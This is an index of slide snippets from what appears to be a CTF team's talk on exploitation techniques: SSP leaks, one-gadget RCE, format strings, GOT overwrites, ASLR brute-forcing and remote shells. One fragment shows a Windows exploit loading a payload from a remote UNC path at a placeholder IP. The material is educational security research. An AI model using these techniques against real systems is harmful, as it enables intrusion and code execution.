- Page 1 and 2: Pwning (sometimes) with style Drago
- Page 3 and 4: Dragon Sector? Insomni'hack 2014 Ge
- Page 5 and 6: Agenda
- Page 7 and 8: The SSP leak • Stack Smashing Pro
- Page 9 and 10: SSP basics - canary verification
- Page 11 and 12: __stack_chk_fail *** stack smashing
- Page 13 and 14: __stack_chk_fail void __attribute__
- Page 15 and 16: The argv array is at the top of the
- Page 17 and 18: We can overwrite it, too! $ ./test_
- Page 19 and 20: Very powerful memory disclosure •
- Page 21: References 1. Dan Rosenberg, Fun wi
- Page 24 and 25: Remote KG Task: Given a PCAP file,
- Page 26 and 27: Remote KG So… what is this protoc
- Page 28 and 29: Remote KG Next steps: ● write a p
- Page 30: JS Puzzle Event: Organizers: SECCON
- Page 34 and 35: One-gadget RCE on Linux • Assumin
- Page 36 and 37: One-gadget RCE on Linux • An exec
- Page 38 and 39: One-gadget RCE on Linux If std{out,
- Page 40 and 41: I/O redirection /bin/sh &N • By d
- Page 42 and 43: One-gadget RCE on Windows • In GN
- Page 44 and 45: One-gadget RCE on Windows • There
- Page 46: LoadLibrary(“\\11.22.33.44\payloa
- Page 49 and 50: zfs Problem 1: Nothing wants to mou
- Page 52 and 53: zfs ● xor_key ● key.xor_encrypt
- Page 54 and 55: zfs ● Gynvael’s way: Brute forc
- Page 56 and 57: zfs Minimizing input - assume that
- Page 58 and 59: zfs
- Page 60 and 61: zfs
- Page 64 and 65: And about system()… • How do we
- Page 66 and 67: Getting remote shell • Otherwise,
- Page 68 and 69: With this, we can… • Leak the a
- Page 70 and 71: libcdb.com
- Page 72 and 73: There’s another way, too • If w
- Page 74: Other teams do it, as well Quote fr
- Page 77 and 78: World Wide Something ^_- TL;DR: .pc
- Page 79 and 80: World Wide Something ^_- Let's recr
- Page 82 and 83: ROP gadgets near libc imports • E
- Page 84 and 85: ROP gadgets near libc imports • 1
- Page 86 and 87: ROP gadgets near libc imports • S
- Page 88 and 89: Partial .got.plt overwrites • If
- Page 90: Brute-forcing ASLR • ASLR on popu
- Page 94 and 95: Format String Fun Typical exploitat
- Page 96 and 97: Even More Format String Fun! Assume
- Page 98 and 99: Even More Format String Fun! printf
- Page 101 and 102: Getting read / recv to fail Imagine
- Page 103 and 104: One-sided connection termination
- Page 105: One-sided connection termination By
- Page 108 and 109: Mumble Mumble high entropy
- Page 110 and 111: Mumble Mumble Approach change: 1. A
- Page 112 and 113: Mumble Mumble
- Page 117 and 118: Patching vs instrumentation ● ●
- Page 119 and 120: 0x90 Event: SIGINT CTF 2013 Organiz
- Page 121 and 122: 0x90 • We decided to run the bina
- Page 123 and 124: It worked! Bochs log console
- Page 125 and 126: Conclusions • CTFs are really fun